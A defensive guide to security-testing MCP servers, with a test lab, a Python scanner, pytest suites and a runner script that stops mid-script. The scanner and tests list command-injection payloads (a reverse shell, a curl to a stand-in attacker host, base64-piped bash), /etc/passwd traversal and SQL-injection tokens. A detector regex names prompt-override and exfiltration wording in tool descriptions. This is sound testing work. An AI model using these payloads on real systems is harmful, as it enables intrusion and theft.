MCP Security Testing: How to Test MCP Servers for Vulnerabilities
A defense-focused guide to security testing MCP server implementations: assessment methodology, scanning tools, and common test cases for auth bypass, injection, traversal, and data leakage, with working test scripts and report templates.
Security testing MCP servers calls for a specialized methodology, because MCP sits at the intersection of traditional application security (HTTP, authentication, input validation) and AI-specific risks (prompt injection, token amplification, tool description poisoning). Standard web application scanners miss MCP-specific vulnerabilities, and AI security tools usually focus on the LLM rather than on the tool infrastructure.
MCP security assessment methodology
Phase overview
┌───────────────────────────────────────────────────────────────┐
│ Phases of the MCP security assessment                         │
├────────────┬──────────────────────────────────────────────────┤
│ Phase 1    │ Reconnaissance and discovery                     │
│            │ - Identify all in-scope MCP servers              │
│            │ - Inventory tools, transports, capabilities      │
│            │ - Map trust boundaries and data flows            │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 2    │ Authentication and authorization testing         │
│            │ - Test for unauthenticated access                │
│            │ - Test token and credential handling             │
│            │ - Verify authorization scopes per tool           │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 3    │ Input validation testing                         │
│            │ - Command injection in all parameters            │
│            │ - Path traversal in file operations              │
│            │ - SQL injection in database tools                │
│            │ - Tool description poisoning analysis            │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 4    │ Session and state testing                        │
│            │ - Data isolation between sessions                │
│            │ - Session fixation and hijacking                 │
│            │ - State cleanup on disconnect                    │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 5    │ Resource and cost testing                        │
│            │ - Token amplification (sampling abuse)           │
│            │ - Output size abuse                              │
│            │ - Rate limiting effectiveness                    │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 6    │ Supply chain and configuration review            │
│            │ - Package integrity verification                 │
│            │ - SDK version validation                         │
│            │ - Network exposure assessment                    │
│            │ - Container and sandbox configuration review     │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 7    │ Reporting and remediation                        │
│            │ - Documentation of findings                      │
│            │ - Risk scoring and prioritization                │
│            │ - Remediation recommendations                    │
│            │ - Verification through retesting                 │
└────────────┴──────────────────────────────────────────────────┘
Setting up a safe test environment
Docker-based test lab
# docker-compose.test.yaml
# Isolated test environment for MCP security testing
version: "3.8"
services:
  # Target MCP server (the server under test)
  target-mcp-server:
    build:
      context: ./target-server
    container_name: mcp-test-target
    ports:
      # Bind to loopback only so the lab is not reachable from other hosts
      - "127.0.0.1:8080:8080"
    environment:
      - MCP_AUTH_ENABLED=true
      - MCP_AUTH_TOKEN=test-token-for-testing-only
      - MCP_WORKSPACE=/workspace
    volumes:
      - test-workspace:/workspace
    networks:
      - test-network
  # MCP security scanner
  mcp-scanner:
    build:
      context: ./scanner
      dockerfile: Dockerfile.scanner
    container_name: mcp-scanner
    environment:
      - TARGET_URL=http://target-mcp-server:8080
      - TEST_TOKEN=test-token-for-testing-only
    volumes:
      - ./reports:/reports
    networks:
      - test-network
    depends_on:
      - target-mcp-server
  # Network traffic capture
  tcpdump:
    image: nicolaka/netshoot
    container_name: mcp-traffic-capture
    command: tcpdump -i any -w /captures/mcp-traffic.pcap port 8080
    volumes:
      - ./captures:/captures
    # Share the target's network namespace: a separate container on the bridge
    # network would only see its own traffic, not scanner-to-target traffic.
    network_mode: "service:target-mcp-server"
    depends_on:
      - target-mcp-server
    cap_add:
      - NET_RAW
      - NET_ADMIN
volumes:
  test-workspace:
networks:
  test-network:
    driver: bridge

#!/bin/bash
# setup-test-lab.sh -- Sets up the MCP security test environment
set -euo pipefail
echo "[*] Creating test workspace with sample files..."
mkdir -p target-server/workspace
echo "public content" > target-server/workspace/public.txt
echo "SECRET_API_KEY=sk-test-12345" > target-server/workspace/.env
mkdir -p target-server/workspace/subdir
echo "nested file" > target-server/workspace/subdir/nested.txt
echo "[*] Creating reports directory..."
mkdir -p reports captures
echo "[*] Starting test environment..."
docker compose -f docker-compose.test.yaml up -d
echo "[*] Waiting for services..."
sleep 5
echo "[*] Verifying test environment..."
# -f makes curl fail on HTTP errors, so an unhealthy server stops the setup
if curl -sf http://localhost:8080/health; then
  echo " -- MCP server healthy"
else
  echo "[!] Health check failed; inspect the container logs" >&2
  exit 1
fi
echo "[+] Test environment ready."
echo " Target: http://localhost:8080"
echo " Reports: ./reports/"
echo " Captures: ./captures/"

MCP security scanner
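The scanner that follows talks to the server with JSON-RPC 2.0 messages. As a minimal sketch of the three request shapes it relies on (`initialize`, `tools/list`, `tools/call`), the helper below builds them as plain dictionaries. `build_request` and the `read_file` tool with its `path` argument are hypothetical names used only for illustration; the field layout mirrors the payloads the scanner constructs in `_jsonrpc_call`.

```python
import json
from typing import Any, Optional


def build_request(method: str,
                  params: Optional[dict[str, Any]] = None,
                  msg_id: int = 1) -> dict[str, Any]:
    """Build a JSON-RPC 2.0 request; 'params' is omitted when empty."""
    request: dict[str, Any] = {"jsonrpc": "2.0", "method": method, "id": msg_id}
    if params:
        request["params"] = params
    return request


# Handshake: announce protocol version and client identity
initialize = build_request("initialize", {
    "protocolVersion": "2024-11-05",
    "clientInfo": {"name": "security-scanner", "version": "1.0"},
    "capabilities": {},
})

# Enumerate the tools the server exposes
list_tools = build_request("tools/list", msg_id=2)

# Invoke one tool (hypothetical tool and argument names)
call_tool = build_request(
    "tools/call",
    {"name": "read_file", "arguments": {"path": "public.txt"}},
    msg_id=3,
)

if __name__ == "__main__":
    for message in (initialize, list_tools, call_tool):
        print(json.dumps(message))
```

Every test case in this guide is a variation on the third shape: the tool name stays fixed while one argument value is swapped for a payload.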
"""
MCP security scanner
Comprehensive security testing tool for MCP server implementations.
"""
import asyncio
import json
import logging
from dataclasses import dataclass, field
from datetime import datetime
from enum import Enum
from typing import Optional

import aiohttp

logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("mcp.scanner")


class Severity(Enum):
    CRITICAL = "critical"
    HIGH = "high"
    MEDIUM = "medium"
    LOW = "low"
    INFO = "info"


@dataclass
class Finding:
    """A security finding from the scan."""
    title: str
    severity: Severity
    category: str
    description: str
    evidence: str = ""
    remediation: str = ""
    references: list[str] = field(default_factory=list)
    cvss_score: float = 0.0


@dataclass
class ScanResult:
    """Complete scan results."""
    target_url: str
    scan_start: datetime
    scan_end: Optional[datetime] = None
    findings: list[Finding] = field(default_factory=list)
    tools_discovered: list[dict] = field(default_factory=list)
    server_info: dict = field(default_factory=dict)


class MCPSecurityScanner:
    """
    Security scanner for MCP servers.
    Tests for common vulnerabilities reported in MCP security research.
    """

    def __init__(self, target_url: str, auth_token: Optional[str] = None):
        self.target_url = target_url.rstrip("/")
        self.auth_token = auth_token
        self.result = ScanResult(
            target_url=target_url,
            scan_start=datetime.utcnow(),
        )

    def _headers(self) -> dict:
        headers = {"Content-Type": "application/json"}
        if self.auth_token:
            headers["Authorization"] = f"Bearer {self.auth_token}"
        return headers

    async def _jsonrpc_call(self, session: aiohttp.ClientSession,
                            method: str, params: Optional[dict] = None,
                            msg_id: int = 1) -> dict:
        """Send a JSON-RPC request to the MCP server.

        Assumes the server returns the JSON-RPC response in the body of the
        POST to /messages/. Servers that deliver responses over an SSE stream
        need a transport-aware client instead.
        """
        payload = {
            "jsonrpc": "2.0",
            "method": method,
            "id": msg_id,
        }
        if params:
            payload["params"] = params
        async with session.post(
            f"{self.target_url}/messages/",
            json=payload,
            headers=self._headers(),
        ) as resp:
            return await resp.json()

    async def run_full_scan(self):
        """Run all security test phases."""
        async with aiohttp.ClientSession() as session:
            logger.info("Starting MCP security scan: %s", self.target_url)
            await self.phase1_discovery(session)
            await self.phase2_authentication(session)
            await self.phase3_input_validation(session)
            await self.phase4_session_isolation(session)
            await self.phase5_resource_abuse(session)
        self.result.scan_end = datetime.utcnow()
        logger.info(
            "Scan complete. Findings: %d (Critical: %d, High: %d)",
            len(self.result.findings),
            sum(1 for f in self.result.findings if f.severity == Severity.CRITICAL),
            sum(1 for f in self.result.findings if f.severity == Severity.HIGH),
        )
        return self.result

    # === Phase 1: Discovery ===
    async def phase1_discovery(self, session: aiohttp.ClientSession):
        """Inventory the MCP server's capabilities and tools."""
        logger.info("Phase 1: Discovery")
        # Attempt to initialize
        try:
            init_result = await self._jsonrpc_call(session, "initialize", {
                "protocolVersion": "2024-11-05",
                "clientInfo": {"name": "security-scanner", "version": "1.0"},
                "capabilities": {},
            })
            self.result.server_info = init_result.get("result", {})
            logger.info("Server info: %s", self.result.server_info.get("serverInfo", {}))
        except Exception as e:
            logger.warning("Initialize failed: %s", e)
        # Enumerate tools
        try:
            tools_result = await self._jsonrpc_call(session, "tools/list")
            tools = tools_result.get("result", {}).get("tools", [])
            self.result.tools_discovered = tools
            logger.info("Discovered %d tools", len(tools))
            # Analyze tool descriptions for injection patterns
            for tool in tools:
                self._analyze_tool_description(tool)
        except Exception as e:
            logger.warning("Tool enumeration failed: %s", e)

    def _analyze_tool_description(self, tool: dict):
        """Check a tool description for injection patterns."""
        import re
        desc = tool.get("description", "")
        name = tool.get("name", "unknown")
        suspicious_patterns = [
            (r"(?i)\byou must\b", "Imperative instruction in tool description"),
            (r"(?i)\balways\b.*\btool\b", "Unconditional tool directive"),
            (r"https?://", "External URL in tool description"),
            (r"(?i)\bignore\b.*\bprevious\b", "Prompt override pattern"),
            (r"(?i)\bsend\b.*\bto\b.*https?://", "Data exfiltration instruction"),
        ]
        # One finding is recorded per matching pattern
        for pattern, desc_text in suspicious_patterns:
            if re.search(pattern, desc):
                self.result.findings.append(Finding(
                    title=f"Suspicious tool description: {name}",
                    severity=Severity.HIGH,
                    category="tool_description_poisoning",
                    description=desc_text,
                    evidence=f"Tool '{name}' description: {desc[:300]}",
                    remediation="Review and sanitize tool descriptions. Remove imperative instructions and external URLs.",
                    references=["OWASP ASI-03"],
                ))

    # === Phase 2: Authentication ===
    async def phase2_authentication(self, session: aiohttp.ClientSession):
        """Test the authentication controls."""
        logger.info("Phase 2: Authentication")
        # Test unauthenticated access
        unauth_headers = {"Content-Type": "application/json"}
        try:
            async with session.post(
                f"{self.target_url}/messages/",
                json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
                headers=unauth_headers,
            ) as resp:
                if resp.status == 200:
                    body = await resp.json()
                    if "result" in body:
                        self.result.findings.append(Finding(
                            title="Unauthenticated access to MCP server",
                            severity=Severity.CRITICAL,
                            category="authentication",
                            description=(
                                "MCP server accepts tool listing without authentication. "
                                "Any network-reachable client can enumerate and call tools."
                            ),
                            evidence="HTTP 200 response to unauthenticated tools/list",
                            remediation="Implement Bearer token or mTLS authentication.",
                            references=["VulnerableMCP", "MCP Auth Gaps"],
                            cvss_score=9.1,
                        ))
                elif resp.status in (401, 403):
                    logger.info("Authentication required (good): HTTP %d", resp.status)
        except Exception as e:
            logger.warning("Auth test failed: %s", e)
        # Test with an invalid token
        bad_headers = {
            "Content-Type": "application/json",
            "Authorization": "Bearer invalid-token-12345",
        }
        try:
            async with session.post(
                f"{self.target_url}/messages/",
                json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
                headers=bad_headers,
            ) as resp:
                if resp.status == 200:
                    self.result.findings.append(Finding(
                        title="Authentication bypass with invalid token",
                        severity=Severity.CRITICAL,
                        category="authentication",
                        description="Server accepts invalid authentication token.",
                        evidence="HTTP 200 with token 'invalid-token-12345'",
                        remediation="Verify token validation logic.",
                        cvss_score=9.8,
                    ))
        except Exception as e:
            logger.warning("Invalid token test failed: %s", e)

    # === Phase 3: Input validation ===
    async def phase3_input_validation(self, session: aiohttp.ClientSession):
        """Test input validation across all tools."""
        logger.info("Phase 3: Input Validation")
        for tool in self.result.tools_discovered:
            tool_name = tool.get("name", "")
            schema = tool.get("inputSchema", {})
            properties = schema.get("properties", {})
            for param_name, param_schema in properties.items():
                param_type = param_schema.get("type", "string")
                if param_type == "string":
                    # Test command injection
                    await self._test_command_injection(
                        session, tool_name, param_name
                    )
                    # Test path traversal (if the parameter name suggests a file path)
                    if any(s in param_name.lower() for s in ["path", "file", "dir", "folder"]):
                        await self._test_path_traversal(
                            session, tool_name, param_name
                        )

    async def _test_command_injection(self, session: aiohttp.ClientSession,
                                      tool_name: str, param_name: str):
        """Test a parameter for command injection."""
        payloads = [
            ("basic_semicolon", "test; id"),
            ("pipe", "test | cat /etc/passwd"),
            ("backtick", "test `id`"),
            ("dollar_paren", "test $(whoami)"),
            ("newline", "test\nid"),
            ("and_chain", "test && curl attacker.example"),
        ]
        for payload_name, payload in payloads:
            try:
                result = await self._jsonrpc_call(session, "tools/call", {
                    "name": tool_name,
                    "arguments": {param_name: payload},
                })
                # Check whether the injection produced output that indicates execution
                result_text = json.dumps(result)
                injection_indicators = ["uid=", "root:", "www-data", "nobody"]
                for indicator in injection_indicators:
                    if indicator in result_text:
                        self.result.findings.append(Finding(
                            title=f"Command injection in {tool_name}.{param_name}",
                            severity=Severity.CRITICAL,
                            category="command_injection",
                            description=(
                                f"Parameter '{param_name}' of tool '{tool_name}' "
                                f"is vulnerable to command injection via {payload_name}."
                            ),
                            evidence=f"Payload: {payload}\nResponse: {result_text[:500]}",
                            remediation=(
                                "Use parameterized command execution (shell=False). "
                                "Validate input against allowlist patterns."
                            ),
                            references=["CVE-2025-6514", "OWASP Command Injection"],
                            cvss_score=9.6,
                        ))
                        # One finding per payload is enough
                        break
            except Exception:
                continue

    async def _test_path_traversal(self, session: aiohttp.ClientSession,
                                   tool_name: str, param_name: str):
        """Test a parameter for path traversal."""
        payloads = [
            ("dot_dot_slash", "../../../etc/passwd"),
            ("absolute", "/etc/passwd"),
            ("encoded", "..%2f..%2f..%2fetc%2fpasswd"),
            ("double_encoded", "..%252f..%252f..%252fetc%252fpasswd"),
            ("null_byte", "valid.txt\x00../../../etc/passwd"),
        ]
        for payload_name, payload in payloads:
            try:
                result = await self._jsonrpc_call(session, "tools/call", {
                    "name": tool_name,
                    "arguments": {param_name: payload},
                })
                result_text = json.dumps(result)
                # Typical /etc/passwd entries indicate the file was read
                passwd_indicators = ["root:x:", "root:*:", "daemon:", "nobody:"]
                for indicator in passwd_indicators:
                    if indicator in result_text:
                        self.result.findings.append(Finding(
                            title=f"Path traversal in {tool_name}.{param_name}",
                            severity=Severity.CRITICAL,
                            category="path_traversal",
                            description=(
                                f"Parameter '{param_name}' of tool '{tool_name}' "
                                f"is vulnerable to path traversal via {payload_name}."
                            ),
                            evidence=f"Payload: {payload}\nResponse contains: {indicator}",
                            remediation=(
                                "Resolve and canonicalize paths before access. "
                                "Verify resolved path is within allowed base directory."
                            ),
                            references=["CVE-2025-68145", "CWE-22"],
                            cvss_score=8.6,
                        ))
                        break
            except Exception:
                continue

    # === Phase 4: Session isolation ===
    async def phase4_session_isolation(self, session: aiohttp.ClientSession):
        """Test data isolation between sessions."""
        logger.info("Phase 4: Session Isolation")
        # This requires two separate connections.
        # Look for a tool pair that stores and retrieves data.
        write_tools = [t for t in self.result.tools_discovered
                       if any(s in t.get("name", "").lower()
                              for s in ["save", "write", "remember", "store", "set"])]
        read_tools = [t for t in self.result.tools_discovered
                      if any(s in t.get("name", "").lower()
                             for s in ["read", "recall", "get", "retrieve", "load"])]
        if not write_tools or not read_tools:
            logger.info("No write/read tool pair found for isolation testing")
            return
        logger.info("Testing session isolation with %s / %s",
                    write_tools[0]["name"], read_tools[0]["name"])
        # Note: this phase only identifies candidate tools. Full isolation
        # testing needs two separate SSE connections and is left to
        # dedicated test scripts.

    # === Phase 5: Resource abuse ===
    async def phase5_resource_abuse(self, session: aiohttp.ClientSession):
        """Test resource limits and rate limiting."""
        logger.info("Phase 5: Resource Abuse")
        # Test rate limiting
        burst_count = 0
        for i in range(50):
            try:
                async with session.post(
                    f"{self.target_url}/messages/",
                    json={"jsonrpc": "2.0", "method": "tools/list", "id": i},
                    headers=self._headers(),
                ) as resp:
                    if resp.status == 429:
                        logger.info("Rate limited at request %d (good)", i)
                        break
                    burst_count += 1
            except Exception:
                break
        if burst_count >= 50:
            self.result.findings.append(Finding(
                title="No rate limiting on MCP tool calls",
                severity=Severity.HIGH,
                category="rate_limiting",
                description=(
                    f"Server accepted {burst_count} rapid requests without rate limiting. "
                    f"This enables denial-of-wallet and brute force attacks."
                ),
                evidence=f"Sent {burst_count} requests in burst, none returned HTTP 429",
                remediation="Implement rate limiting per client IP and per session.",
                references=["MCP Denial of Wallet"],
            ))
        # Test output size limits
        for tool in self.result.tools_discovered:
            if "query" in tool.get("name", "").lower():
                try:
                    result = await self._jsonrpc_call(session, "tools/call", {
                        "name": tool["name"],
                        "arguments": {"query": "SELECT * FROM large_table LIMIT 1000000"},
                    })
                    result_size = len(json.dumps(result))
                    if result_size > 1_000_000:
                        self.result.findings.append(Finding(
                            title=f"No output size limit on {tool['name']}",
                            severity=Severity.MEDIUM,
                            category="resource_abuse",
                            description=f"Tool returned {result_size} bytes without truncation.",
                            remediation="Implement output size limits on all tools.",
                        ))
                except Exception:
                    continue

    def generate_report(self, format: str = "json") -> str:
        """Generate the security assessment report."""
        if format == "json":
            return json.dumps({
                "target": self.result.target_url,
                "scan_start": self.result.scan_start.isoformat(),
                "scan_end": self.result.scan_end.isoformat() if self.result.scan_end else None,
                "summary": {
                    "total_findings": len(self.result.findings),
                    "critical": sum(1 for f in self.result.findings if f.severity == Severity.CRITICAL),
                    "high": sum(1 for f in self.result.findings if f.severity == Severity.HIGH),
                    "medium": sum(1 for f in self.result.findings if f.severity == Severity.MEDIUM),
                    "low": sum(1 for f in self.result.findings if f.severity == Severity.LOW),
                    "tools_discovered": len(self.result.tools_discovered),
                },
                "server_info": self.result.server_info,
                "findings": [
                    {
                        "title": f.title,
                        "severity": f.severity.value,
                        "category": f.category,
                        "description": f.description,
                        "evidence": f.evidence,
                        "remediation": f.remediation,
                        "references": f.references,
                        "cvss_score": f.cvss_score,
                    }
                    # Highest CVSS score first
                    for f in sorted(self.result.findings,
                                    key=lambda x: x.cvss_score, reverse=True)
                ],
            }, indent=2)
        # Fail loudly instead of silently writing an empty report
        raise ValueError(f"Unsupported report format: {format}")


# CLI runner
async def main():
    import argparse
    import os

    parser = argparse.ArgumentParser(description="MCP Security Scanner")
    parser.add_argument("target", help="MCP server URL")
    parser.add_argument("--token", help="Authentication token")
    parser.add_argument("--output", default="reports/mcp-scan.json", help="Output file")
    args = parser.parse_args()
    scanner = MCPSecurityScanner(args.target, auth_token=args.token)
    await scanner.run_full_scan()
    report = scanner.generate_report()
    # Create the output directory if it does not exist yet
    os.makedirs(os.path.dirname(args.output) or ".", exist_ok=True)
    with open(args.output, "w") as f:
        f.write(report)
    print(f"\nReport written to: {args.output}")
    print(f"Findings: {len(scanner.result.findings)}")


if __name__ == "__main__":
    asyncio.run(main())

Standalone test scripts
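Phase 4 of the scanner only locates a candidate write/read tool pair. As a sketch of the isolation check itself: write a unique marker through one session, read through a second session, and treat the marker showing up in the second response as a leak. `ToolCaller`, `check_session_isolation`, `make_fake_session`, and the tool and argument names (`remember`, `recall`, `key`, `value`) are assumptions made for illustration. In a real test each caller would wrap its own authenticated MCP connection; here an in-memory stand-in keeps the example runnable.

```python
import asyncio
import json
import secrets
from typing import Any, Awaitable, Callable

# A caller sends one tools/call request on a specific session (hypothetical type)
ToolCaller = Callable[[str, dict[str, Any]], Awaitable[dict[str, Any]]]


async def check_session_isolation(session_a: ToolCaller, session_b: ToolCaller,
                                  write_tool: str, read_tool: str) -> bool:
    """Return True if data written in session A is NOT visible in session B."""
    marker = f"isolation-canary-{secrets.token_hex(8)}"
    await session_a(write_tool, {"key": "scan-probe", "value": marker})
    response = await session_b(read_tool, {"key": "scan-probe"})
    return marker not in json.dumps(response)


def make_fake_session(store: dict[str, str]) -> ToolCaller:
    """In-memory stand-in for one MCP session (demonstration only)."""
    async def call(tool: str, arguments: dict[str, Any]) -> dict[str, Any]:
        if tool == "remember":
            store[arguments["key"]] = arguments["value"]
            text = "ok"
        else:
            text = store.get(arguments["key"], "")
        return {"result": {"content": [{"type": "text", "text": text}]}}
    return call


def demo() -> tuple[bool, bool]:
    # Leaky server: both sessions share one backing store
    shared: dict[str, str] = {}
    leaky = asyncio.run(check_session_isolation(
        make_fake_session(shared), make_fake_session(shared),
        "remember", "recall"))
    # Isolated server: each session has its own store
    isolated = asyncio.run(check_session_isolation(
        make_fake_session({}), make_fake_session({}),
        "remember", "recall"))
    return leaky, isolated
```

The random marker matters: a fixed string could already exist in the store from an earlier run and produce a false leak report.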
Authentication bypass tests
"""
mcp_test_auth.py -- Test cases for authentication bypass on MCP servers.
"""
import os

import aiohttp
import pytest


class TestMCPAuthentication:
    """Tests the authentication controls on MCP servers."""

    # The runner script passes the target through the TARGET environment variable
    TARGET = os.environ.get("TARGET", "http://localhost:8080")

    @pytest.mark.asyncio
    async def test_no_token_rejected(self):
        """A request without a token must be rejected."""
        async with aiohttp.ClientSession() as session:
            async with session.post(
                f"{self.TARGET}/messages/",
                json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
                headers={"Content-Type": "application/json"},
            ) as resp:
                assert resp.status in (401, 403), \
                    f"Unauthenticated request accepted (HTTP {resp.status})"

    @pytest.mark.asyncio
    async def test_invalid_token_rejected(self):
        """A request with an invalid token must be rejected."""
        async with aiohttp.ClientSession() as session:
            async with session.post(
                f"{self.TARGET}/messages/",
                json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
                headers={
                    "Content-Type": "application/json",
                    "Authorization": "Bearer invalid-token",
                },
            ) as resp:
                assert resp.status in (401, 403), \
                    f"Invalid token accepted (HTTP {resp.status})"

    @pytest.mark.asyncio
    async def test_expired_token_rejected(self):
        """A request with an expired token must be rejected."""
        # Use a test token that is known to have expired
        async with aiohttp.ClientSession() as session:
            async with session.post(
                f"{self.TARGET}/messages/",
                json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
                headers={
                    "Content-Type": "application/json",
                    "Authorization": "Bearer expired-test-token-2025",
                },
            ) as resp:
                assert resp.status in (401, 403), \
                    f"Expired token accepted (HTTP {resp.status})"

    @pytest.mark.asyncio
    async def test_empty_bearer_rejected(self):
        """An empty bearer token must be rejected."""
        async with aiohttp.ClientSession() as session:
            async with session.post(
                f"{self.TARGET}/messages/",
                json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
                headers={
                    "Content-Type": "application/json",
                    "Authorization": "Bearer ",
                },
            ) as resp:
                assert resp.status in (401, 403), \
                    f"Empty bearer token accepted (HTTP {resp.status})"

    @pytest.mark.asyncio
    async def test_sql_injection_in_token(self):
        """SQL injection in the token field must be rejected safely."""
        injection_tokens = [
            "' OR '1'='1",
            "admin'--",
            "\" OR \"1\"=\"1",
            "1; DROP TABLE tokens;",
        ]
        async with aiohttp.ClientSession() as session:
            for token in injection_tokens:
                async with session.post(
                    f"{self.TARGET}/messages/",
                    json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
                    headers={
                        "Content-Type": "application/json",
                        "Authorization": f"Bearer {token}",
                    },
                ) as resp:
                    assert resp.status in (401, 403), \
                        f"SQL injection token accepted: {token}"

Command injection tests
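Matching on strings such as `uid=` or `nobody` can misfire when a tool legitimately returns that text. One common alternative, sketched here on the assumption that the target shell supports POSIX arithmetic expansion, is to inject an arithmetic expression and look for its computed result. The product never appears in the payload itself, so a server that merely echoes the input back does not trigger a match. `make_canary`, `make_canary_payloads`, and `canary_executed` are hypothetical helper names.

```python
import secrets


def make_canary() -> tuple[int, int, str]:
    """Pick two random 5-digit factors and return them with their product."""
    a = secrets.randbelow(90000) + 10000
    b = secrets.randbelow(90000) + 10000
    return a, b, str(a * b)


def make_canary_payloads(a: int, b: int) -> dict[str, str]:
    """Wrap a harmless 'echo $((a*b))' in common shell metacharacter forms."""
    expr = f"echo $(({a}*{b}))"
    return {
        "semicolon": f"test; {expr}",
        "and_chain": f"test && {expr}",
        "pipe": f"test | {expr}",
        "dollar_paren": f"test $({expr})",
        "backtick": f"test `{expr}`",
        "newline": f"test\n{expr}",
    }


def canary_executed(response_text: str, expected: str) -> bool:
    """True only if the shell evaluated the expression and printed the product."""
    return expected in response_text


if __name__ == "__main__":
    a, b, expected = make_canary()
    for name, payload in make_canary_payloads(a, b).items():
        print(f"{name}: {payload!r} -> look for {expected}")
```

Because the payload only prints a number, it is also safer to run against a shared lab than payloads that read files or open network connections.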
"""
mcp_test_injection.py -- Test cases for command injection.
"""
import json
import os

import aiohttp
import pytest
import pytest_asyncio

INJECTION_PAYLOADS = {
    "semicolon": "test; id",
    "pipe_to_shell": "test | bash",
    "backtick": "`id`",
    "dollar_paren": "$(whoami)",
    "dollar_brace": "${IFS}cat${IFS}/etc/passwd",
    "newline": "test\nid",
    "carriage_return": "test\r\nid",
    "ampersand": "test && id",
    "or_chain": "test || id",
    "subshell": "(id)",
    "redirect": "test > /tmp/pwned",
    "reverse_shell": "test; bash -i >& /dev/tcp/127.0.0.1/4444 0>&1",
    "python_exec": "test; python3 -c 'import os;os.system(\"id\")'",
    "null_byte": "test\x00; id",
    "base64_decode": "test; echo aWQ= | base64 -d | bash",
}


class TestCommandInjection:
    """Tests all tool parameters for command injection."""

    # The runner script passes these through environment variables
    TARGET = os.environ.get("TARGET", "http://localhost:8080")
    TOKEN = os.environ.get("TOKEN", "test-token-for-testing-only")

    # Async fixtures need pytest_asyncio.fixture; a plain pytest.fixture
    # is not awaited when pytest-asyncio runs in strict mode.
    @pytest_asyncio.fixture
    async def session(self):
        async with aiohttp.ClientSession() as s:
            yield s

    @pytest_asyncio.fixture
    async def tools(self, session):
        """Discover the available tools."""
        async with session.post(
            f"{self.TARGET}/messages/",
            json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
            headers={
                "Content-Type": "application/json",
                "Authorization": f"Bearer {self.TOKEN}",
            },
        ) as resp:
            data = await resp.json()
            return data.get("result", {}).get("tools", [])

    @pytest.mark.asyncio
    @pytest.mark.parametrize("payload_name,payload", list(INJECTION_PAYLOADS.items()))
    async def test_injection_blocked(self, session, tools, payload_name, payload):
        """Verify that injection payloads are blocked for all string parameters."""
        for tool in tools:
            tool_name = tool["name"]
            properties = tool.get("inputSchema", {}).get("properties", {})
            for param_name, param_schema in properties.items():
                # Only string parameters are injection candidates
                if param_schema.get("type", "string") != "string":
                    continue
                async with session.post(
                    f"{self.TARGET}/messages/",
                    json={
                        "jsonrpc": "2.0",
                        "method": "tools/call",
                        "id": 1,
                        "params": {
                            "name": tool_name,
                            "arguments": {param_name: payload},
                        },
                    },
                    headers={
                        "Content-Type": "application/json",
                        "Authorization": f"Bearer {self.TOKEN}",
                    },
                ) as resp:
                    data = await resp.json()
                    result_text = json.dumps(data).lower()
                    # These strings indicate successful command execution
                    dangerous_outputs = [
                        "uid=", "root:", "www-data", "nobody:",
                        "/bin/bash", "/bin/sh", "permission denied",
                    ]
                    for indicator in dangerous_outputs:
                        assert indicator not in result_text, (
                            f"COMMAND INJECTION: {tool_name}.{param_name} "
                            f"with payload '{payload_name}' produced output "
                            f"containing '{indicator}'"
                        )

Running the tests
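The runner script in this section writes the pytest results as JUnit XML, but its summary step reads only the scanner's JSON report. As a sketch of how the XML results could be folded in with the standard library alone, the helper below totals the counters on each `<testsuite>` element. `summarize_suites` and `SAMPLE_JUNIT` are hypothetical names, and the sample document is made up for the example; it assumes the `tests`, `failures`, `errors`, and `skipped` attributes that pytest's `--junitxml` output carries.

```python
import xml.etree.ElementTree as ET

COUNTERS = ("tests", "failures", "errors", "skipped")


def summarize_suites(root: ET.Element) -> dict[str, int]:
    """Sum the result counters over every <testsuite> element under root."""
    totals = {key: 0 for key in COUNTERS}
    # iter() also yields root itself, so a bare <testsuite> root works too
    for suite in root.iter("testsuite"):
        for key in COUNTERS:
            totals[key] += int(suite.get(key, 0))
    return totals


def summarize_file(path: str) -> dict[str, int]:
    """Convenience wrapper for a JUnit XML file on disk."""
    return summarize_suites(ET.parse(path).getroot())


# Made-up sample in the shape of a pytest JUnit report
SAMPLE_JUNIT = """
<testsuites>
  <testsuite name="pytest" tests="5" failures="1" errors="0" skipped="0">
    <testcase classname="mcp_test_auth.TestMCPAuthentication"
              name="test_no_token_rejected">
      <failure message="Unauthenticated request accepted (HTTP 200)"/>
    </testcase>
  </testsuite>
</testsuites>
"""

if __name__ == "__main__":
    print(summarize_suites(ET.fromstring(SAMPLE_JUNIT.strip())))
```

A failed authentication or injection test is itself a finding, so counting failures next to the scanner's findings gives a more complete summary.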
#!/bin/bash
# run-mcp-security-tests.sh -- Runs all MCP security tests
set -euo pipefail
TARGET="${1:-http://localhost:8080}"
TOKEN="${2:-test-token-for-testing-only}"
REPORT_DIR="./reports/$(date +%Y%m%d_%H%M%S)"
mkdir -p "$REPORT_DIR"
echo "=== MCP Security Test Suite ==="
echo "Target: $TARGET"
echo "Report: $REPORT_DIR"
echo ""
# Run the Python scanner
echo "[*] Running MCP Security Scanner..."
python3 mcp_scanner.py "$TARGET" \
  --token "$TOKEN" \
  --output "$REPORT_DIR/scanner-report.json"
# Run the pytest suites. A failing test is a finding, not a script error,
# so "|| true" keeps "set -e" and "pipefail" from aborting the run.
echo ""
echo "[*] Running Authentication Tests..."
TARGET="$TARGET" TOKEN="$TOKEN" \
  pytest mcp_test_auth.py -v --tb=short \
  --junitxml="$REPORT_DIR/auth-tests.xml" 2>&1 | tee "$REPORT_DIR/auth-tests.log" || true
echo ""
echo "[*] Running Injection Tests..."
TARGET="$TARGET" TOKEN="$TOKEN" \
  pytest mcp_test_injection.py -v --tb=short \
  --junitxml="$REPORT_DIR/injection-tests.xml" 2>&1 | tee "$REPORT_DIR/injection-tests.log" || true
echo ""
echo "[*] Generating summary report..."
python3 << PYEOF
import json, os
report_dir = "$REPORT_DIR"
findings = []
# Collect the scanner's findings
scanner_report = os.path.join(report_dir, "scanner-report.json")
if os.path.exists(scanner_report):
    with open(scanner_report) as f:
        data = json.load(f)
    findings.extend(data.get("findings", []))
print(f"\n{'='*60}")
print(f" MCP Security Assessment Summary")
